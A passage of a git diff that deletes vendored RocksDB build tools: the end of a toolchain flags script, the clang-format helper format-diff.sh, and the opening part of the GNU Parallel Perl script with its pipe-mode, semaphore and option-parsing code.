-CXXFLAGS+=" $CFLAGS"
-
-EXEC_LDFLAGS=" $SNAPPY_LIBS $ZLIB_LIBS $BZIP2_LIBS $LZ4_LIBS $ZSTD_LIBS $GFLAGS_LIBS $NUMA_LIB $TBB_LIBS"
-EXEC_LDFLAGS+=" -Wl,--dynamic-linker,/usr/local/fbcode/gcc-4.8.1-glibc-2.17/lib/ld.so"
-EXEC_LDFLAGS+=" $LIBUNWIND"
-EXEC_LDFLAGS+=" -Wl,-rpath=/usr/local/fbcode/gcc-4.8.1-glibc-2.17/lib"
-# required by libtbb
-EXEC_LDFLAGS+=" -ldl"
-
-PLATFORM_LDFLAGS="$LIBGCC_LIBS $GLIBC_LIBS $STDLIBS -lgcc -lstdc++"
-
-EXEC_LDFLAGS_SHARED="$SNAPPY_LIBS $ZLIB_LIBS $BZIP2_LIBS $LZ4_LIBS $ZSTD_LIBS $GFLAGS_LIBS"
-
-VALGRIND_VER="$VALGRIND_BASE/bin/"
-
-LUA_PATH="$LUA_BASE"
-
-export CC CXX AR CFLAGS CXXFLAGS EXEC_LDFLAGS EXEC_LDFLAGS_SHARED VALGRIND_VER JEMALLOC_LIB JEMALLOC_INCLUDE LUA_PATH
diff --git a/thirdparty/rocksdb/build_tools/format-diff.sh b/thirdparty/rocksdb/build_tools/format-diff.sh
deleted file mode 100755
index 81221ed..0000000
--- a/thirdparty/rocksdb/build_tools/format-diff.sh
+++ /dev/null
@@ -1,122 +0,0 @@
-#!/usr/bin/env bash
-# If clang_format_diff.py command is not specfied, we assume we are able to
-# access directly without any path.
-if [ -z $CLANG_FORMAT_DIFF ]
-then
-CLANG_FORMAT_DIFF="clang-format-diff.py"
-fi
-
-# Check clang-format-diff.py
-if ! which $CLANG_FORMAT_DIFF &> /dev/null
-then
-  echo "You didn't have clang-format-diff.py and/or clang-format available in your computer!"
-  echo "You can download clang-format-diff.py by running: "
-  echo "    curl --location http://goo.gl/iUW1u2 -o ${CLANG_FORMAT_DIFF}"
-  echo "You can download clang-format by running: "
-  echo "    brew install clang-format"
-  echo "Then, move both files (i.e. ${CLANG_FORMAT_DIFF} and clang-format) to some directory within PATH=${PATH}"
-  exit 128
-fi
-
-# Check argparse, a library that clang-format-diff.py requires.
-python 2>/dev/null << EOF
-import argparse
-EOF
-
-if [ "$?" != 0 ]
-then
-  echo "To run clang-format-diff.py, we'll need the library "argparse" to be"
-  echo "installed. You can try either of the follow ways to install it:"
-  echo "  1. Manually download argparse: https://pypi.python.org/pypi/argparse"
-  echo "  2. easy_install argparse (if you have easy_install)"
-  echo "  3. pip install argparse (if you have pip)"
-  exit 129
-fi
-
-# TODO(kailiu) following work is not complete since we still need to figure
-# out how to add the modified files done pre-commit hook to git's commit index.
-#
-# Check if this script has already been added to pre-commit hook.
-# Will suggest user to add this script to pre-commit hook if their pre-commit
-# is empty.
-# PRE_COMMIT_SCRIPT_PATH="`git rev-parse --show-toplevel`/.git/hooks/pre-commit"
-# if ! ls $PRE_COMMIT_SCRIPT_PATH &> /dev/null
-# then
-#   echo "Would you like to add this script to pre-commit hook, which will do "
-#   echo -n "the format check for all the affected lines before you check in (y/n):"
-#   read add_to_hook
-#   if [ "$add_to_hook" == "y" ]
-#   then
-#     ln -s `git rev-parse --show-toplevel`/build_tools/format-diff.sh $PRE_COMMIT_SCRIPT_PATH
-#   fi
-# fi
-set -e
-
-uncommitted_code=`git diff HEAD`
-LAST_MASTER=`git merge-base master HEAD`
-
-# If there's no uncommitted changes, we assume user are doing post-commit
-# format check, in which case we'll check the modified lines since last commit
-# from master. Otherwise, we'll check format of the uncommitted code only.
-if [ -z "$uncommitted_code" ]
-then
-  # Check the format of last commit
-  diffs=$(git diff -U0 $LAST_MASTER^ | $CLANG_FORMAT_DIFF -p 1)
-else
-  # Check the format of uncommitted lines,
-  diffs=$(git diff -U0 HEAD | $CLANG_FORMAT_DIFF -p 1)
-fi
-
-if [ -z "$diffs" ]
-then
-  echo "Nothing needs to be reformatted!"
-  exit 0
-fi
-
-# Highlight the insertion/deletion from the clang-format-diff.py's output
-COLOR_END="\033[0m"
-COLOR_RED="\033[0;31m" 
-COLOR_GREEN="\033[0;32m" 
-
-echo -e "Detect lines that doesn't follow the format rules:\r"
-# Add the color to the diff. lines added will be green; lines removed will be red.
-echo "$diffs" | 
-  sed -e "s/\(^-.*$\)/`echo -e \"$COLOR_RED\1$COLOR_END\"`/" |
-  sed -e "s/\(^+.*$\)/`echo -e \"$COLOR_GREEN\1$COLOR_END\"`/"
-
-if [[ "$OPT" == *"-DTRAVIS"* ]]
-then
-  exit 1
-fi
-
-echo -e "Would you like to fix the format automatically (y/n): \c"
-
-# Make sure under any mode, we can read user input.
-exec < /dev/tty
-read to_fix
-
-if [ "$to_fix" != "y" ]
-then
-  exit 1
-fi
-
-# Do in-place format adjustment.
-if [ -z "$uncommitted_code" ]
-then
-  git diff -U0 $LAST_MASTER^ | $CLANG_FORMAT_DIFF -i -p 1
-else
-  git diff -U0 HEAD^ | $CLANG_FORMAT_DIFF -i -p 1
-fi
-echo "Files reformatted!"
-
-# Amend to last commit if user do the post-commit format check
-if [ -z "$uncommitted_code" ]; then
-  echo -e "Would you like to amend the changes to last commit (`git log HEAD --oneline | head -1`)? (y/n): \c"
-  read to_amend
-
-  if [ "$to_amend" == "y" ]
-  then
-    git commit -a --amend --reuse-message HEAD
-    echo "Amended to last commit"
-  fi
-fi
diff --git a/thirdparty/rocksdb/build_tools/gnu_parallel b/thirdparty/rocksdb/build_tools/gnu_parallel
deleted file mode 100755
index abbf8f1..0000000
--- a/thirdparty/rocksdb/build_tools/gnu_parallel
+++ /dev/null
@@ -1,7936 +0,0 @@
-#!/usr/bin/env perl
-
-# Copyright (C) 2007,2008,2009,2010,2011,2012,2013,2014 Ole Tange and
-# Free Software Foundation, Inc.
-#
-# This program is free software; you can redistribute it and/or modify
-# it under the terms of the GNU General Public License as published by
-# the Free Software Foundation; either version 3 of the License, or
-# (at your option) any later version.
-#
-# This program is distributed in the hope that it will be useful, but
-# WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
-# General Public License for more details.
-#
-# You should have received a copy of the GNU General Public License
-# along with this program; if not, see <http://www.gnu.org/licenses/>
-# or write to the Free Software Foundation, Inc., 51 Franklin St,
-# Fifth Floor, Boston, MA 02110-1301 USA
-
-# open3 used in Job::start
-use IPC::Open3;
-# &WNOHANG used in reaper
-use POSIX qw(:sys_wait_h setsid ceil :errno_h);
-# gensym used in Job::start
-use Symbol qw(gensym);
-# tempfile used in Job::start
-use File::Temp qw(tempfile tempdir);
-# mkpath used in openresultsfile
-use File::Path;
-# GetOptions used in get_options_from_array
-use Getopt::Long;
-# Used to ensure code quality
-use strict;
-use File::Basename;
-
-if(not $ENV{HOME}) {
-    # $ENV{HOME} is sometimes not set if called from PHP
-    ::warning("\$HOME not set. Using /tmp\n");
-    $ENV{HOME} = "/tmp";
-}
-
-save_stdin_stdout_stderr();
-save_original_signal_handler();
-parse_options();
-::debug("init", "Open file descriptors: ", join(" ",keys %Global::fd), "\n");
-my $number_of_args;
-if($Global::max_number_of_args) {
-    $number_of_args=$Global::max_number_of_args;
-} elsif ($opt::X or $opt::m or $opt::xargs) {
-    $number_of_args = undef;
-} else {
-    $number_of_args = 1;
-}
-
-my @command;
-@command = @ARGV;
-
-my @fhlist;
-if($opt::pipepart) {
-    @fhlist = map { open_or_exit($_) } "/dev/null";
-} else {
-    @fhlist = map { open_or_exit($_) } @opt::a;
-    if(not @fhlist and not $opt::pipe) {
-	@fhlist = (*STDIN);
-    }
-}
-
-if($opt::skip_first_line) {
-    # Skip the first line for the first file handle
-    my $fh = $fhlist[0];
-    <$fh>;
-}
-if($opt::header and not $opt::pipe) {
-    my $fh = $fhlist[0];
-    # split with colsep or \t
-    # $header force $colsep = \t if undef?
-    my $delimiter = $opt::colsep;
-    $delimiter ||= "\$";
-    my $id = 1;
-    for my $fh (@fhlist) {
-	my $line = <$fh>;
-	chomp($line);
-	::debug("init", "Delimiter: '$delimiter'");
-	for my $s (split /$delimiter/o, $line) {
-	    ::debug("init", "Colname: '$s'");
-	    # Replace {colname} with {2}
-	    # TODO accept configurable short hands
-	    # TODO how to deal with headers in {=...=}
-	    for(@command) {
-	      s:\{$s(|/|//|\.|/\.)\}:\{$id$1\}:g;
-	    }
-	    $Global::input_source_header{$id} = $s;
-	    $id++;
-	}
-    }
-} else {
-    my $id = 1;
-    for my $fh (@fhlist) {
-	$Global::input_source_header{$id} = $id;
-	$id++;
-    }
-}
-
-if($opt::filter_hosts and (@opt::sshlogin or @opt::sshloginfile)) {
-    # Parallel check all hosts are up. Remove hosts that are down
-    filter_hosts();
-}
-
-if($opt::nonall or $opt::onall) {
-    onall(@command);
-    wait_and_exit(min(undef_as_zero($Global::exitstatus),254));
-}
-
-# TODO --transfer foo/./bar --cleanup
-# multiple --transfer and --basefile with different /./
-
-$Global::JobQueue = JobQueue->new(
-    \@command,\@fhlist,$Global::ContextReplace,$number_of_args,\@Global::ret_files);
-
-if($opt::eta or $opt::bar) {
-    # Count the number of jobs before starting any
-    $Global::JobQueue->total_jobs();
-}
-if($opt::pipepart) {
-    @Global::cat_partials = map { pipe_part_files($_) } @opt::a;
-    # Unget the command as many times as there are parts
-    $Global::JobQueue->{'commandlinequeue'}->unget(
-	map { $Global::JobQueue->{'commandlinequeue'}->get() } @Global::cat_partials
-	);
-}
-for my $sshlogin (values %Global::host) {
-    $sshlogin->max_jobs_running();
-}
-
-init_run_jobs();
-my $sem;
-if($Global::semaphore) {
-    $sem = acquire_semaphore();
-}
-$SIG{TERM} = \&start_no_new_jobs;
-
-start_more_jobs();
-if(not $opt::pipepart) {
-    if($opt::pipe) {
-	spreadstdin();
-    }
-}
-::debug("init", "Start draining\n");
-drain_job_queue();
-::debug("init", "Done draining\n");
-reaper();
-::debug("init", "Done reaping\n");
-if($opt::pipe and @opt::a) {
-    for my $job (@Global::tee_jobs) {
-	unlink $job->fh(2,"name");
-	$job->set_fh(2,"name","");
-	$job->print();
-	unlink $job->fh(1,"name");
-    }
-}
-::debug("init", "Cleaning\n");
-cleanup();
-if($Global::semaphore) {
-    $sem->release();
-}
-for(keys %Global::sshmaster) {
-    kill "TERM", $_;
-}
-::debug("init", "Halt\n");
-if($opt::halt_on_error) {
-    wait_and_exit($Global::halt_on_error_exitstatus);
-} else {
-    wait_and_exit(min(undef_as_zero($Global::exitstatus),254));
-}
-
-sub __PIPE_MODE__ {}
-
-sub pipe_part_files {
-    # Input:
-    #   $file = the file to read
-    # Returns:
-    #   @commands that will cat_partial each part
-    my ($file) = @_;
-    my $buf = "";
-    my $header = find_header(\$buf,open_or_exit($file));
-    # find positions
-    my @pos = find_split_positions($file,$opt::blocksize,length $header);
-    # Make @cat_partials
-    my @cat_partials = ();
-    for(my $i=0; $i<$#pos; $i++) {
-	push @cat_partials, cat_partial($file, 0, length($header), $pos[$i], $pos[$i+1]);
-    }
-    # Remote exec should look like:
-    #  ssh -oLogLevel=quiet lo  'eval `echo $SHELL | grep "/t\{0,1\}csh" > /dev/null  && echo setenv PARALLEL_SEQ '$PARALLEL_SEQ'\;  setenv PARALLEL_PID '$PARALLEL_PID'  || echo PARALLEL_SEQ='$PARALLEL_SEQ'\;export PARALLEL_SEQ\;  PARALLEL_PID='$PARALLEL_PID'\;export PARALLEL_PID` ;'  tty\ \>/dev/null\ \&\&\ stty\ isig\ -onlcr\ -echo\;echo\ \$SHELL\ \|\ grep\ \"/t\\\{0,1\\\}csh\"\ \>\ /dev/null\ \&\&\ setenv\ FOO\ /tmp/foo\ \|\|\ export\ FOO=/tmp/foo\; \(wc\ -\ \$FOO\)
-    # ssh -tt not allowed. Remote will die due to broken pipe anyway.
-    # TODO test remote with --fifo / --cat
-    return @cat_partials;
-}
-
-sub find_header {
-    # Input:
-    #   $buf_ref = reference to read-in buffer
-    #   $fh = filehandle to read from
-    # Uses:
-    #   $opt::header
-    #   $opt::blocksize
-    # Returns:
-    #   $header string
-    my ($buf_ref, $fh) = @_;
-    my $header = "";
-    if($opt::header) {
-	if($opt::header eq ":") { $opt::header = "(.*\n)"; }
-	# Number = number of lines
-	$opt::header =~ s/^(\d+)$/"(.*\n)"x$1/e;
-	while(read($fh,substr($$buf_ref,length $$buf_ref,0),$opt::blocksize)) {
-	    if($$buf_ref=~s/^($opt::header)//) {
-		$header = $1;
-		last;
-	    }
-	}
-    }
-    return $header;
-}
-
-sub find_split_positions {
-    # Input:
-    #   $file = the file to read
-    #   $block = (minimal) --block-size of each chunk
-    #   $headerlen = length of header to be skipped
-    # Uses:
-    #   $opt::recstart
-    #   $opt::recend
-    # Returns:
-    #   @positions of block start/end
-    my($file, $block, $headerlen) = @_;
-    my $size = -s $file;
-    $block = int $block;
-    # The optimal dd blocksize for mint, redhat, solaris, openbsd = 2^17..2^20
-    # The optimal dd blocksize for freebsd = 2^15..2^17
-    my $dd_block_size = 131072; # 2^17
-    my @pos;
-    my ($recstart,$recend) = recstartrecend();
-    my $recendrecstart = $recend.$recstart;
-    my $fh = ::open_or_exit($file);
-    push(@pos,$headerlen);
-    for(my $pos = $block+$headerlen; $pos < $size; $pos += $block) {
-	my $buf;
-	seek($fh, $pos, 0) || die;
-	while(read($fh,substr($buf,length $buf,0),$dd_block_size)) {
-	    if($opt::regexp) {
-		# If match /$recend$recstart/ => Record position
-		if($buf =~ /(.*$recend)$recstart/os) {
-		    my $i = length($1);
-		    push(@pos,$pos+$i);
-		    # Start looking for next record _after_ this match
-		    $pos += $i;
-		    last;
-		}
-	    } else {
-		# If match $recend$recstart => Record position
-		my $i = index($buf,$recendrecstart);
-		if($i != -1) {
-		    push(@pos,$pos+$i);
-		    # Start looking for next record _after_ this match
-		    $pos += $i;
-		    last;
-		}
-	    }
-	}
-    }
-    push(@pos,$size);
-    close $fh;
-    return @pos;
-}
-
-sub cat_partial {
-    # Input:
-    #   $file = the file to read
-    #   ($start, $end, [$start2, $end2, ...]) = start byte, end byte
-    # Returns:
-    #   Efficient perl command to copy $start..$end, $start2..$end2, ... to stdout
-    my($file, @start_end) = @_;
-    my($start, $i);
-    # Convert start_end to start_len
-    my @start_len = map { if(++$i % 2) { $start = $_; } else { $_-$start } } @start_end;
-    return "<". shell_quote_scalar($file) .
-	q{ perl -e 'while(@ARGV) { sysseek(STDIN,shift,0) || die; $left = shift; while($read = sysread(STDIN,$buf, ($left > 32768 ? 32768 : $left))){ $left -= $read; syswrite(STDOUT,$buf); } }' } .
-	" @start_len";
-}
-
-sub spreadstdin {
-    # read a record
-    # Spawn a job and print the record to it.
-    # Uses:
-    #   $opt::blocksize
-    #   STDIN
-    #   $opr::r
-    #   $Global::max_lines
-    #   $Global::max_number_of_args
-    #   $opt::regexp
-    #   $Global::start_no_new_jobs
-    #   $opt::roundrobin
-    #   %Global::running
-
-    my $buf = "";
-    my ($recstart,$recend) = recstartrecend();
-    my $recendrecstart = $recend.$recstart;
-    my $chunk_number = 1;
-    my $one_time_through;
-    my $blocksize = $opt::blocksize;
-    my $in = *STDIN;
-    my $header = find_header(\$buf,$in);
-    while(1) {
-      my $anything_written = 0;
-      if(not read($in,substr($buf,length $buf,0),$blocksize)) {
-	  # End-of-file
-	  $chunk_number != 1 and last;
-	  # Force the while-loop once if everything was read by header reading
-	  $one_time_through++ and last;
-      }
-      if($opt::r) {
-	  # Remove empty lines
-	  $buf =~ s/^\s*\n//gm;
-	  if(length $buf == 0) {
-	      next;
-	  }
-      }
-      if($Global::max_lines and not $Global::max_number_of_args) {
-	  # Read n-line records
-	  my $n_lines = $buf =~ tr/\n/\n/;
-	  my $last_newline_pos = rindex($buf,"\n");
-	  while($n_lines % $Global::max_lines) {
-	      $n_lines--;
-	      $last_newline_pos = rindex($buf,"\n",$last_newline_pos-1);
-	  }
-	  # Chop at $last_newline_pos as that is where n-line record ends
-	  $anything_written +=
-	      write_record_to_pipe($chunk_number++,\$header,\$buf,
-				   $recstart,$recend,$last_newline_pos+1);
-	  substr($buf,0,$last_newline_pos+1) = "";
-      } elsif($opt::regexp) {
-	  if($Global::max_number_of_args) {
-	      # -N => (start..*?end){n}
-	      # -L -N => (start..*?end){n*l}
-	      my $read_n_lines = $Global::max_number_of_args * ($Global::max_lines || 1);
-	      while($buf =~ s/((?:$recstart.*?$recend){$read_n_lines})($recstart.*)$/$2/os) {
-		  # Copy to modifiable variable
-		  my $b = $1;
-		  $anything_written +=
-		      write_record_to_pipe($chunk_number++,\$header,\$b,
-					   $recstart,$recend,length $1);
-	      }
-	  } else {
-	      # Find the last recend-recstart in $buf
-	      if($buf =~ s/(.*$recend)($recstart.*?)$/$2/os) {
-		  # Copy to modifiable variable
-		  my $b = $1;
-		  $anything_written +=
-		      write_record_to_pipe($chunk_number++,\$header,\$b,
-					   $recstart,$recend,length $1);
-	      }
-	  }
-      } else {
-	  if($Global::max_number_of_args) {
-	      # -N => (start..*?end){n}
-	      my $i = 0;
-	      my $read_n_lines = $Global::max_number_of_args * ($Global::max_lines || 1);
-	      while(($i = nindex(\$buf,$recendrecstart,$read_n_lines)) != -1) {
-		  $i += length $recend; # find the actual splitting location
-		  $anything_written +=
-		      write_record_to_pipe($chunk_number++,\$header,\$buf,
-					   $recstart,$recend,$i);
-		  substr($buf,0,$i) = "";
-	      }
-	  } else {
-	      # Find the last recend-recstart in $buf
-	      my $i = rindex($buf,$recendrecstart);
-	      if($i != -1) {
-		  $i += length $recend; # find the actual splitting location
-		  $anything_written +=
-		      write_record_to_pipe($chunk_number++,\$header,\$buf,
-					   $recstart,$recend,$i);
-		  substr($buf,0,$i) = "";
-	      }
-	  }
-      }
-      if(not $anything_written and not eof($in)) {
-	  # Nothing was written - maybe the block size < record size?
-	  # Increase blocksize exponentially
-	  my $old_blocksize = $blocksize;
-	  $blocksize = ceil($blocksize * 1.3 + 1);
-	  ::warning("A record was longer than $old_blocksize. " .
-		    "Increasing to --blocksize $blocksize\n");
-      }
-    }
-    ::debug("init", "Done reading input\n");
-
-    # If there is anything left in the buffer write it
-    substr($buf,0,0) = "";
-    write_record_to_pipe($chunk_number++,\$header,\$buf,$recstart,$recend,length $buf);
-
-    $Global::start_no_new_jobs ||= 1;
-    if($opt::roundrobin) {
-	for my $job (values %Global::running) {
-	    close $job->fh(0,"w");
-	}
-	my %incomplete_jobs = %Global::running;
-	my $sleep = 1;
-	while(keys %incomplete_jobs) {
-	    my $something_written = 0;
-	    for my $pid (keys %incomplete_jobs) {
-		my $job = $incomplete_jobs{$pid};
-		if($job->stdin_buffer_length()) {
-		    $something_written += $job->non_block_write();
-		} else {
-		    delete $incomplete_jobs{$pid}
-		}
-	    }
-	    if($something_written) {
-		$sleep = $sleep/2+0.001;
-	    }
-	    $sleep = ::reap_usleep($sleep);
-	}
-    }
-}
-
-sub recstartrecend {
-    # Uses:
-    #   $opt::recstart
-    #   $opt::recend
-    # Returns:
-    #   $recstart,$recend with default values and regexp conversion
-    my($recstart,$recend);
-    if(defined($opt::recstart) and defined($opt::recend)) {
-	# If both --recstart and --recend is given then both must match
-	$recstart = $opt::recstart;
-	$recend = $opt::recend;
-    } elsif(defined($opt::recstart)) {
-	# If --recstart is given it must match start of record
-	$recstart = $opt::recstart;
-	$recend = "";
-    } elsif(defined($opt::recend)) {
-	# If --recend is given then it must match end of record
-	$recstart = "";
-	$recend = $opt::recend;
-    }
-
-    if($opt::regexp) {
-	# If $recstart/$recend contains '|' this should only apply to the regexp
-	$recstart = "(?:".$recstart.")";
-	$recend = "(?:".$recend.")";
-    } else {
-	# $recstart/$recend = printf strings (\n)
-	$recstart =~ s/\\([0rnt\'\"\\])/"qq|\\$1|"/gee;
-	$recend =~ s/\\([0rnt\'\"\\])/"qq|\\$1|"/gee;
-    }
-    return ($recstart,$recend);
-}
-
-sub nindex {
-    # See if string is in buffer N times
-    # Returns:
-    #   the position where the Nth copy is found
-    my ($buf_ref, $str, $n) = @_;
-    my $i = 0;
-    for(1..$n) {
-	$i = index($$buf_ref,$str,$i+1);
-	if($i == -1) { last }
-    }
-    return $i;
-}
-
-{
-    my @robin_queue;
-
-    sub round_robin_write {
-	# Input:
-	#   $header_ref = ref to $header string
-	#   $block_ref = ref to $block to be written
-	#   $recstart = record start string
-	#   $recend = record end string
-	#   $endpos = end position of $block
-	# Uses:
-	#   %Global::running
-	my ($header_ref,$block_ref,$recstart,$recend,$endpos) = @_;
-	my $something_written = 0;
-	my $block_passed = 0;
-	my $sleep = 1;
-	while(not $block_passed) {
-	    # Continue flushing existing buffers
-	    # until one is empty and a new block is passed
-	    # Make a queue to spread the blocks evenly
-	    if(not @robin_queue) {
-		push @robin_queue, values %Global::running;
-	    }
-	    while(my $job = shift @robin_queue) {
-		if($job->stdin_buffer_length() > 0) {
-		    $something_written += $job->non_block_write();
-		} else {
-		    $job->set_stdin_buffer($header_ref,$block_ref,$endpos,$recstart,$recend);
-		    $block_passed = 1;
-		    $job->set_virgin(0);
-		    $something_written += $job->non_block_write();
-		    last;
-		}
-	    }
-	    $sleep = ::reap_usleep($sleep);
-	}
-	return $something_written;
-    }
-}
-
-sub write_record_to_pipe {
-    # Fork then
-    # Write record from pos 0 .. $endpos to pipe
-    # Input:
-    #   $chunk_number = sequence number - to see if already run
-    #   $header_ref = reference to header string to prepend
-    #   $record_ref = reference to record to write
-    #   $recstart = start string of record
-    #   $recend = end string of record
-    #   $endpos = position in $record_ref where record ends
-    # Uses:
-    #   $Global::job_already_run
-    #   $opt::roundrobin
-    #   @Global::virgin_jobs
-    # Returns:
-    #   Number of chunks written (0 or 1)
-    my ($chunk_number,$header_ref,$record_ref,$recstart,$recend,$endpos) = @_;
-    if($endpos == 0) { return 0; }
-    if(vec($Global::job_already_run,$chunk_number,1)) { return 1; }
-    if($opt::roundrobin) {
-	return round_robin_write($header_ref,$record_ref,$recstart,$recend,$endpos);
-    }
-    # If no virgin found, backoff
-    my $sleep = 0.0001; # 0.01 ms - better performance on highend
-    while(not @Global::virgin_jobs) {
-	::debug("pipe", "No virgin jobs");
-	$sleep = ::reap_usleep($sleep);
-	# Jobs may not be started because of loadavg
-	# or too little time between each ssh login.
-	start_more_jobs();
-    }
-    my $job = shift @Global::virgin_jobs;
-    # Job is no longer virgin
-    $job->set_virgin(0);
-    if(fork()) {
-	# Skip
-    } else {
-	# Chop of at $endpos as we do not know how many rec_sep will
-	# be removed.
-	substr($$record_ref,$endpos,length $$record_ref) = "";
-	# Remove rec_sep
-	if($opt::remove_rec_sep) {
-	    Job::remove_rec_sep($record_ref,$recstart,$recend);
-	}
-	$job->write($header_ref);
-	$job->write($record_ref);
-	close $job->fh(0,"w");
-	exit(0);
-    }
-    close $job->fh(0,"w");
-    return 1;
-}
-
-sub __SEM_MODE__ {}
-
-sub acquire_semaphore {
-    # Acquires semaphore. If needed: spawns to the background
-    # Uses:
-    #   @Global::host
-    # Returns:
-    #   The semaphore to be released when jobs is complete
-    $Global::host{':'} = SSHLogin->new(":");
-    my $sem = Semaphore->new($Semaphore::name,$Global::host{':'}->max_jobs_running());
-    $sem->acquire();
-    if($Semaphore::fg) {
-	# skip
-    } else {
-	# If run in the background, the PID will change
-	# therefore release and re-acquire the semaphore
-	$sem->release();
-	if(fork()) {
-	    exit(0);
-	} else {
-	    # child
-	    # Get a semaphore for this pid
-	    ::die_bug("Can't start a new session: $!") if setsid() == -1;
-	    $sem = Semaphore->new($Semaphore::name,$Global::host{':'}->max_jobs_running());
-	    $sem->acquire();
-	}
-    }
-    return $sem;
-}
-
-sub __PARSE_OPTIONS__ {}
-
-sub options_hash {
-    # Returns:
-    #   %hash = the GetOptions config
-    return
-	("debug|D=s" => \$opt::D,
-	 "xargs" => \$opt::xargs,
-	 "m" => \$opt::m,
-	 "X" => \$opt::X,
-	 "v" => \@opt::v,
-	 "joblog=s" => \$opt::joblog,
-	 "results|result|res=s" => \$opt::results,
-	 "resume" => \$opt::resume,
-	 "resume-failed|resumefailed" => \$opt::resume_failed,
-	 "silent" => \$opt::silent,
-	 #"silent-error|silenterror" => \$opt::silent_error,
-	 "keep-order|keeporder|k" => \$opt::keeporder,
-	 "group" => \$opt::group,
-	 "g" => \$opt::retired,
-	 "ungroup|u" => \$opt::ungroup,
-	 "linebuffer|linebuffered|line-buffer|line-buffered" => \$opt::linebuffer,
-	 "tmux" => \$opt::tmux,
-	 "null|0" => \$opt::0,
-	 "quote|q" => \$opt::q,
-	 # Replacement strings
-	 "parens=s" => \$opt::parens,
-	 "rpl=s" => \@opt::rpl,
-	 "plus" => \$opt::plus,
-	 "I=s" => \$opt::I,
-	 "extensionreplace|er=s" => \$opt::U,
-	 "U=s" => \$opt::retired,
-	 "basenamereplace|bnr=s" => \$opt::basenamereplace,
-	 "dirnamereplace|dnr=s" => \$opt::dirnamereplace,
-	 "basenameextensionreplace|bner=s" => \$opt::basenameextensionreplace,
-	 "seqreplace=s" => \$opt::seqreplace,
-	 "slotreplace=s" => \$opt::slotreplace,
-	 "jobs|j=s" => \$opt::jobs,
-	 "delay=f" => \$opt::delay,
-	 "sshdelay=f" => \$opt::sshdelay,
-	 "load=s" => \$opt::load,
-	 "noswap" => \$opt::noswap,
-	 "max-line-length-allowed" => \$opt::max_line_length_allowed,
-	 "number-of-cpus" => \$opt::number_of_cpus,
-	 "number-of-cores" => \$opt::number_of_cores,
-	 "use-cpus-instead-of-cores" => \$opt::use_cpus_instead_of_cores,
-	 "shellquote|shell_quote|shell-quote" => \$opt::shellquote,
-	 "nice=i" => \$opt::nice,
-	 "timeout=s" => \$opt::timeout,
-	 "tag" => \$opt::tag,
-	 "tagstring|tag-string=s" => \$opt::tagstring,
-	 "onall" => \$opt::onall,
-	 "nonall" => \$opt::nonall,
-	 "filter-hosts|filterhosts|filter-host" => \$opt::filter_hosts,
-	 "sshlogin|S=s" => \@opt::sshlogin,
-	 "sshloginfile|slf=s" => \@opt::sshloginfile,
-	 "controlmaster|M" => \$opt::controlmaster,
-	 "return=s" => \@opt::return,
-	 "trc=s" => \@opt::trc,
-	 "transfer" => \$opt::transfer,
-	 "cleanup" => \$opt::cleanup,
-	 "basefile|bf=s" => \@opt::basefile,
-	 "B=s" => \$opt::retired,
-	 "ctrlc|ctrl-c" => \$opt::ctrlc,
-	 "noctrlc|no-ctrlc|no-ctrl-c" => \$opt::noctrlc,
-	 "workdir|work-dir|wd=s" => \$opt::workdir,
-	 "W=s" => \$opt::retired,
-	 "tmpdir=s" => \$opt::tmpdir,
-	 "tempdir=s" => \$opt::tmpdir,
-	 "use-compress-program|compress-program=s" => \$opt::compress_program,
-	 "use-decompress-program|decompress-program=s" => \$opt::decompress_program,
-	 "compress" => \$opt::compress,
-	 "tty" => \$opt::tty,
-	 "T" => \$opt::retired,
-	 "halt-on-error|halt=s" => \$opt::halt_on_error,
-	 "H=i" => \$opt::retired,
-	 "retries=i" => \$opt::retries,
-	 "dry-run|dryrun" => \$opt::dryrun,
-	 "progress" => \$opt::progress,
-	 "eta" => \$opt::eta,
-	 "bar" => \$opt::bar,
-	 "arg-sep|argsep=s" => \$opt::arg_sep,
-	 "arg-file-sep|argfilesep=s" => \$opt::arg_file_sep,
-	 "trim=s" => \$opt::trim,
-	 "env=s" => \@opt::env,
-	 "recordenv|record-env" => \$opt::record_env,
-	 "plain" => \$opt::plain,
-	 "profile|J=s" => \@opt::profile,
-	 "pipe|spreadstdin" => \$opt::pipe,
-	 "robin|round-robin|roundrobin" => \$opt::roundrobin,
-	 "recstart=s" => \$opt::recstart,
-	 "recend=s" => \$opt::recend,
-	 "regexp|regex" => \$opt::regexp,
-	 "remove-rec-sep|removerecsep|rrs" => \$opt::remove_rec_sep,
-	 "files|output-as-files|outputasfiles" => \$opt::files,
-	 "block|block-size|blocksize=s" => \$opt::blocksize,
-	 "tollef" => \$opt::retired,
-	 "gnu" => \$opt::gnu,
-	 "xapply" => \$opt::xapply,
-	 "bibtex" => \$opt::bibtex,
-	 "nn|nonotice|no-notice" => \$opt::no_notice,
-	 # xargs-compatibility - implemented, man, testsuite
-	 "max-procs|P=s" => \$opt::jobs,
-	 "delimiter|d=s" => \$opt::d,
-	 "max-chars|s=i" => \$opt::max_chars,
-	 "arg-file|a=s" => \@opt::a,
-	 "no-run-if-empty|r" => \$opt::r,
-	 "replace|i:s" => \$opt::i,
-	 "E=s" => \$opt::eof,
-	 "eof|e:s" => \$opt::eof,
-	 "max-args|n=i" => \$opt::max_args,
-	 "max-replace-args|N=i" => \$opt::max_replace_args,
-	 "colsep|col-sep|C=s" => \$opt::colsep,
-	 "help|h" => \$opt::help,
-	 "L=f" => \$opt::L,
-	 "max-lines|l:f" => \$opt::max_lines,
-	 "interactive|p" => \$opt::p,
-	 "verbose|t" => \$opt::verbose,
-	 "version|V" => \$opt::version,
-	 "minversion|min-version=i" => \$opt::minversion,
-	 "show-limits|showlimits" => \$opt::show_limits,
-	 "exit|x" => \$opt::x,
-	 # Semaphore
-	 "semaphore" => \$opt::semaphore,
-	 "semaphoretimeout=i" => \$opt::semaphoretimeout,
-	 "semaphorename|id=s" => \$opt::semaphorename,
-	 "fg" => \$opt::fg,
-	 "bg" => \$opt::bg,
-	 "wait" => \$opt::wait,
-	 # Shebang #!/usr/bin/parallel --shebang
-	 "shebang|hashbang" => \$opt::shebang,
-	 "internal-pipe-means-argfiles" => \$opt::internal_pipe_means_argfiles,
-	 "Y" => \$opt::retired,
-         "skip-first-line" => \$opt::skip_first_line,
-	 "header=s" => \$opt::header,
-	 "cat" => \$opt::cat,
-	 "fifo" => \$opt::fifo,
-	 "pipepart|pipe-part" => \$opt::pipepart,
-	 "hgrp|hostgroup|hostgroups" => \$opt::hostgroups,
-	);
-}
-
